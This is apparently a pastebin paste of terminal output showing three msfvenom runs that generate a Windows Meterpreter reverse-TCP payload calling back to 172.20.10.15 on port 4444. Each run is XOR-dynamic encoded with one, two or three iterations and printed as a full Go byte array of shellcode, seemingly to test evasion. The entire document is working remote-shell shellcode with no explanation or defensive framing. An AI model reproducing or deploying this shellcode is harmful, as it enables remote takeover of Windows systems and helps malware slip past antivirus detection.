Facebook
From jp2gmd, 1 Month ago, written in Plain Text.
Embed
Download Paste or View Raw
Hits: 151
  1. ┌──(root㉿XTBK-3006)-[/home/security]
  2. └─# msfvenom -p windows/meterpreter/reverse_tcp LHost=172.20.10.15 LPORT=4444 -f go -e x86/xor_dynamic -i 1
  3. [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  4. [-] No arch selected, selecting arch: x86 from the payload
  5. Found 1 compatible encoders
  6. Attempting to encode payload with 1 iterations of x86/xor_dynamic
  7. x86/xor_dynamic succeeded with size 400 (iteration=0)
  8. x86/xor_dynamic chosen with final size 400
  9. Payload size: 400 bytes
  10. Final size of go file: 2050 bytes
  11. buf :=  []byte{0xeb,0x23,0x5b,0x89,0xdf,0xb0,0xe5,0xfc,0xae,
  12. 0x75,0xfd,0x89,0xf9,0x89,0xde,0x8a,0x06,0x30,0x07,0x47,0x66,
  13. 0x81,0x3f,0x4b,0x95,0x74,0x08,0x46,0x80,0x3e,0xe5,0x75,0xee,
  14. 0xeb,0xea,0xff,0xe1,0xe8,0xd8,0xff,0xff,0xff,0x13,0xe5,0xef,
  15. 0xfb,0x9c,0x13,0x13,0x13,0x73,0x22,0xc1,0x9a,0xf6,0x77,0x98,
  16. 0x41,0x23,0x98,0x41,0x1f,0x98,0x41,0x07,0x98,0x61,0x3b,0x22,
  17. 0xec,0x1c,0xa4,0x59,0x35,0x22,0xd3,0xbf,0x2f,0x72,0x6f,0x11,
  18. 0x3f,0x33,0xd2,0xdc,0x1e,0x12,0xd4,0x5a,0x66,0xfc,0x41,0x44,
  19. 0x98,0x41,0x03,0x98,0x51,0x2f,0x12,0xc3,0x98,0x53,0x6b,0x96,
  20. 0xd3,0x67,0x5f,0x12,0xc3,0x98,0x4b,0x33,0x98,0x5b,0x0b,0x12,
  21. 0xc0,0x43,0x96,0xda,0x67,0x2f,0x22,0xec,0x5a,0x98,0x27,0x98,
  22. 0x12,0xc5,0x22,0xd3,0xd2,0xdc,0x1e,0xbf,0x12,0xd4,0x2b,0xf3,
  23. 0x66,0xe7,0x10,0x6e,0xeb,0x28,0x6e,0x37,0x66,0xf3,0x4b,0x98,
  24. 0x4b,0x37,0x12,0xc0,0x75,0x98,0x1f,0x58,0x98,0x4b,0x0f,0x12,
  25. 0xc0,0x98,0x17,0x98,0x12,0xc3,0x9a,0x57,0x37,0x37,0x48,0x48,
  26. 0x72,0x4a,0x49,0x42,0xec,0xf3,0x4b,0x4c,0x49,0x98,0x01,0xfa,
  27. 0x93,0xec,0xec,0xec,0x4e,0x7b,0x20,0x21,0x13,0x13,0x7b,0x64,
  28. 0x60,0x21,0x4c,0x47,0x7b,0x5f,0x64,0x35,0x14,0x9a,0xfb,0xec,
  29. 0xc3,0xab,0x83,0x12,0x13,0x13,0x3a,0xd7,0x47,0x43,0x7b,0x3a,
  30. 0x93,0x78,0x13,0xec,0xc6,0x79,0x19,0x7b,0xbf,0x07,0x19,0x1c,
  31. 0x7b,0x11,0x13,0x02,0x4f,0x9a,0xf5,0x43,0x43,0x43,0x43,0x53,
  32. 0x43,0x53,0x43,0x7b,0xf9,0x1c,0xcc,0xf3,0xec,0xc6,0x84,0x79,
  33. 0x03,0x45,0x44,0x7b,0x8a,0xb6,0x67,0x72,0xec,0xc6,0x96,0xd3,
  34. 0x67,0x19,0xec,0x5d,0x1b,0x66,0xff,0xfb,0x74,0x13,0x13,0x13,
  35. 0x79,0x13,0x79,0x17,0x45,0x44,0x7b,0x11,0xca,0xdb,0x4c,0xec,
  36. 0xc6,0x90,0xeb,0x13,0x6d,0x25,0x98,0x25,0x79,0x53,0x7b,0x13,
  37. 0x03,0x13,0x13,0x45,0x79,0x13,0x7b,0x4b,0xb7,0x40,0xf6,0xec,
  38. 0xc6,0x80,0x40,0x79,0x13,0x45,0x40,0x44,0x7b,0x11,0xca,0xdb,
  39. 0x4c,0xec,0xc6,0x90,0xeb,0x13,0x6e,0x3b,0x4b,0x7b,0x13,0x53,
  40. 0x13,0x13,0x79,0x13,0x43,0x7b,0x18,0x3c,0x1c,0x23,0xec,0xc6,
  41. 0x44,0x7b,0x66,0x7d,0x5e,0x72,0xec,0xc6,0x4d,0x4d,0xec,0x1f,
  42. 0x37,0x1c,0x96,0x63,0xec,0xec,0xec,0xfa,0x88,0xec,0xec,0xec,
  43. 0x12,0xd0,0x3a,0xd5,0x66,0xd2,0xd0,0xa8,0xe3,0xa6,0xb1,0x45,
  44. 0x79,0x13,0x40,0xec,0xc6,0x4b,0x95};
  45.  
  46. ┌──(root㉿XTBK-3006)-[/home/security]
  47. └─# msfvenom -p windows/meterpreter/reverse_tcp LHost=172.20.10.15 LPORT=4444 -f go -e x86/xor_dynamic -i 2
  48. [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  49. [-] No arch selected, selecting arch: x86 from the payload
  50. Found 1 compatible encoders
  51. Attempting to encode payload with 2 iterations of x86/xor_dynamic
  52. x86/xor_dynamic succeeded with size 400 (iteration=0)
  53. x86/xor_dynamic succeeded with size 446 (iteration=1)
  54. x86/xor_dynamic chosen with final size 446
  55. Payload size: 446 bytes
  56. Final size of go file: 2284 bytes
  57. buf :=  []byte{0xeb,0x23,0x5b,0x89,0xdf,0xb0,0x52,0xfc,0xae,
  58. 0x75,0xfd,0x89,0xf9,0x89,0xde,0x8a,0x06,0x30,0x07,0x47,0x66,
  59. 0x81,0x3f,0x39,0xb5,0x74,0x08,0x46,0x80,0x3e,0x52,0x75,0xee,
  60. 0xeb,0xea,0xff,0xe1,0xe8,0xd8,0xff,0xff,0xff,0x04,0x52,0xef,
  61. 0x27,0x5f,0x8d,0xdb,0xb4,0xe5,0xf8,0xaa,0x71,0xf9,0x8d,0xfd,
  62. 0x8d,0xda,0x8e,0x02,0x34,0x03,0x43,0x62,0x85,0x3b,0x3b,0x1a,
  63. 0x70,0x0c,0x42,0x84,0x3a,0xe5,0x71,0xea,0xef,0xee,0xfb,0xe5,
  64. 0xec,0xdc,0xfb,0xfb,0xfb,0x17,0xe5,0xeb,0xff,0x98,0x17,0x17,
  65. 0x17,0x77,0x9e,0xf2,0x26,0xc5,0x73,0x9c,0x45,0x27,0x9c,0x45,
  66. 0x1b,0x9c,0x45,0x03,0x9c,0x65,0x3f,0x26,0xe8,0x18,0xa0,0x5d,
  67. 0x31,0x26,0xd7,0xbb,0x2b,0x76,0x6b,0x15,0x3b,0x37,0xd6,0xd8,
  68. 0x1a,0x16,0xd0,0x5e,0x62,0xf8,0x45,0x40,0x9c,0x45,0x07,0x9c,
  69. 0x55,0x2b,0x16,0xc7,0x9c,0x57,0x6f,0x92,0xd7,0x63,0x5b,0x16,
  70. 0xc7,0x9c,0x5f,0x0f,0x9c,0x4f,0x37,0x47,0x16,0xc4,0x92,0xde,
  71. 0x63,0x2b,0x5e,0x9c,0x23,0x9c,0x16,0xc1,0x26,0xe8,0x26,0xd7,
  72. 0xbb,0xd6,0xd8,0x1a,0x16,0xd0,0x2f,0xf7,0x62,0xe3,0x14,0x6a,
  73. 0xef,0x2c,0x6a,0x33,0x62,0xf7,0x4f,0x9c,0x4f,0x33,0x16,0xc4,
  74. 0x71,0x9c,0x1b,0x5c,0x9c,0x4f,0x0b,0x16,0xc4,0x9c,0x13,0x9c,
  75. 0x16,0xc7,0x9e,0x53,0x33,0x33,0x4c,0x4c,0x76,0x4e,0x4d,0x46,
  76. 0xe8,0xf7,0x4f,0x48,0x4d,0x9c,0x05,0xfe,0x97,0xe8,0xe8,0xe8,
  77. 0x4a,0x7f,0x24,0x25,0x17,0x17,0x7f,0x60,0x64,0x25,0x48,0x43,
  78. 0x7f,0x5b,0x60,0x31,0x10,0x9e,0xff,0xe8,0xc7,0xaf,0x87,0x16,
  79. 0x17,0x17,0x3e,0xd3,0x43,0x47,0x7f,0x3e,0x97,0x7c,0x17,0xe8,
  80. 0xc2,0x7d,0x1d,0x7f,0xbb,0x03,0x1d,0x18,0x7f,0x15,0x17,0x06,
  81. 0x4b,0x9e,0xf1,0x47,0x47,0x47,0x47,0x57,0x47,0x57,0x47,0x7f,
  82. 0xfd,0x18,0xc8,0xf7,0xe8,0xc2,0x80,0x7d,0x07,0x41,0x40,0x7f,
  83. 0x8e,0xb2,0x63,0x76,0xe8,0xc2,0x92,0xd7,0x63,0x1d,0xe8,0x59,
  84. 0x1f,0x62,0xfb,0xff,0x70,0x17,0x17,0x17,0x7d,0x17,0x7d,0x13,
  85. 0x41,0x40,0x7f,0x15,0xce,0xdf,0x48,0xe8,0xc2,0x94,0xef,0x17,
  86. 0x69,0x21,0x9c,0x21,0x7d,0x57,0x7f,0x17,0x07,0x17,0x17,0x41,
  87. 0x7d,0x17,0x7f,0x4f,0xb3,0x44,0xf2,0xe8,0xc2,0x84,0x44,0x7d,
  88. 0x17,0x41,0x44,0x40,0x7f,0x15,0xce,0xdf,0x48,0xe8,0xc2,0x94,
  89. 0xef,0x17,0x6a,0x3f,0x4f,0x7f,0x17,0x57,0x17,0x17,0x7d,0x17,
  90. 0x47,0x7f,0x1c,0x38,0x18,0x27,0xe8,0xc2,0x40,0x7f,0x62,0x79,
  91. 0x5a,0x76,0xe8,0xc2,0x49,0x49,0xe8,0x1b,0x33,0x18,0x92,0x67,
  92. 0xe8,0xe8,0xe8,0xfe,0x8c,0xe8,0xe8,0xe8,0x16,0xd4,0x3e,0xd1,
  93. 0x62,0xd6,0xd4,0xac,0xe7,0xa2,0xb5,0x41,0x7d,0x17,0x44,0xe8,
  94. 0xc2,0x3b,0x1a,0x39,0xb5};
  95.  
  96. ┌──(root㉿XTBK-3006)-[/home/security]
  97. └─# msfvenom -p windows/meterpreter/reverse_tcp LHost=172.20.10.15 LPORT=4444 -f go -e x86/xor_dynamic -i 3
  98. [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
  99. [-] No arch selected, selecting arch: x86 from the payload
  100. Found 1 compatible encoders
  101. Attempting to encode payload with 3 iterations of x86/xor_dynamic
  102. x86/xor_dynamic succeeded with size 400 (iteration=0)
  103. x86/xor_dynamic succeeded with size 446 (iteration=1)
  104. x86/xor_dynamic succeeded with size 492 (iteration=2)
  105. x86/xor_dynamic chosen with final size 492
  106. Payload size: 492 bytes
  107. Final size of go file: 2518 bytes
  108. buf :=  []byte{0xeb,0x23,0x5b,0x89,0xdf,0xb0,0x75,0xfc,0xae,
  109. 0x75,0xfd,0x89,0xf9,0x89,0xde,0x8a,0x06,0x30,0x07,0x47,0x66,
  110. 0x81,0x3f,0xe5,0x6e,0x74,0x08,0x46,0x80,0x3e,0x75,0x75,0xee,
  111. 0xeb,0xea,0xff,0xe1,0xe8,0xd8,0xff,0xff,0xff,0x20,0x75,0xcb,
  112. 0x03,0x7b,0xa9,0xff,0x90,0x99,0xdc,0x8e,0x55,0xdd,0xa9,0xd9,
  113. 0xa9,0xfe,0xaa,0x26,0x10,0x27,0x67,0x46,0xa1,0x1f,0x73,0xe5,
  114. 0x54,0x28,0x66,0xa0,0x1e,0x99,0x55,0xce,0xcb,0xca,0xdf,0xc1,
  115. 0xc8,0xf8,0xdf,0xdf,0xdf,0x24,0x99,0xcf,0x07,0x7f,0xad,0xfb,
  116. 0x94,0xf8,0xd8,0x8a,0x51,0xd9,0xad,0xdd,0xad,0xfa,0xae,0x22,
  117. 0x14,0x23,0x63,0x42,0xa5,0x1b,0x3c,0xf8,0x50,0x2c,0x62,0xa4,
  118. 0x1a,0xf8,0x51,0xca,0xcf,0xce,0xdb,0xc5,0xcc,0xfc,0xdb,0xdb,
  119. 0xdb,0x37,0xf8,0xcb,0xdf,0xb8,0x37,0x37,0x37,0x57,0xbe,0xd2,
  120. 0x06,0xe5,0x53,0xbc,0x65,0x07,0xbc,0x65,0x3b,0xbc,0x65,0x23,
  121. 0x38,0x80,0x7d,0x11,0xbc,0x45,0x1f,0x06,0xc8,0x06,0xf7,0x9b,
  122. 0x0b,0x56,0x4b,0x35,0x1b,0x17,0xf6,0xf8,0x3a,0x36,0xf0,0x7e,
  123. 0x42,0xd8,0x65,0x60,0xbc,0x65,0x27,0xbc,0x75,0x0b,0x36,0xe7,
  124. 0xbc,0x77,0x4f,0xb2,0xf7,0x43,0x7b,0x36,0xe7,0x67,0xbc,0x6f,
  125. 0x17,0x36,0xe4,0xbc,0x7f,0x2f,0xb2,0xfe,0x43,0x0b,0x7e,0xbc,
  126. 0x03,0xbc,0x06,0xc8,0x36,0xe1,0x06,0xf7,0xf6,0xf8,0x3a,0x9b,
  127. 0x36,0xf0,0x0f,0xd7,0x42,0xc3,0x34,0x4a,0xcf,0x0c,0x4a,0x13,
  128. 0x42,0xd7,0x6f,0xbc,0x6f,0x13,0x36,0xe4,0x51,0xbc,0x3b,0x7c,
  129. 0xbc,0x6f,0x2b,0x36,0xe4,0xbc,0x33,0xbc,0x36,0xe7,0xbe,0x73,
  130. 0x13,0x13,0x6c,0x6c,0x56,0x6e,0x6d,0x66,0xc8,0xd7,0x6f,0x68,
  131. 0x6d,0xbc,0x25,0xde,0xb7,0xc8,0xc8,0xc8,0x6a,0x5f,0x04,0x05,
  132. 0x37,0x37,0x5f,0x40,0x44,0x05,0x68,0x63,0x5f,0x7b,0x40,0x11,
  133. 0x30,0xbe,0xdf,0xc8,0xe7,0x8f,0xa7,0x36,0x37,0x37,0x1e,0xf3,
  134. 0x63,0x67,0x5f,0x1e,0xb7,0x5c,0x37,0xc8,0xe2,0x5d,0x3d,0x5f,
  135. 0x9b,0x23,0x3d,0x38,0x5f,0x35,0x37,0x26,0x6b,0xbe,0xd1,0x67,
  136. 0x67,0x67,0x67,0x77,0x67,0x77,0x67,0x5f,0xdd,0x38,0xe8,0xd7,
  137. 0xc8,0xe2,0xa0,0x5d,0x27,0x61,0x60,0x5f,0xae,0x92,0x43,0x56,
  138. 0xc8,0xe2,0xb2,0xf7,0x43,0x3d,0xc8,0x79,0x3f,0x42,0xdb,0xdf,
  139. 0x50,0x37,0x37,0x37,0x5d,0x37,0x5d,0x33,0x61,0x60,0x5f,0x35,
  140. 0xee,0xff,0x68,0xc8,0xe2,0xb4,0xcf,0x37,0x49,0x01,0xbc,0x01,
  141. 0x5d,0x77,0x5f,0x37,0x27,0x37,0x37,0x61,0x5d,0x37,0x5f,0x6f,
  142. 0x93,0x64,0xd2,0xc8,0xe2,0xa4,0x64,0x5d,0x37,0x61,0x64,0x60,
  143. 0x5f,0x35,0xee,0xff,0x68,0xc8,0xe2,0xb4,0xcf,0x37,0x4a,0x1f,
  144. 0x6f,0x5f,0x37,0x77,0x37,0x37,0x5d,0x37,0x67,0x5f,0x3c,0x18,
  145. 0x38,0x07,0xc8,0xe2,0x60,0x5f,0x42,0x59,0x7a,0x56,0xc8,0xe2,
  146. 0x69,0x69,0xc8,0x3b,0x13,0x38,0xb2,0x47,0xc8,0xc8,0xc8,0xde,
  147. 0xac,0xc8,0xc8,0xc8,0x36,0xf4,0x1e,0xf1,0x42,0xf6,0xf4,0x8c,
  148. 0xc7,0x82,0x95,0x61,0x5d,0x37,0x64,0xc8,0xe2,0x3c,0xf8,0x73,
  149. 0xe5,0xe5,0x6e};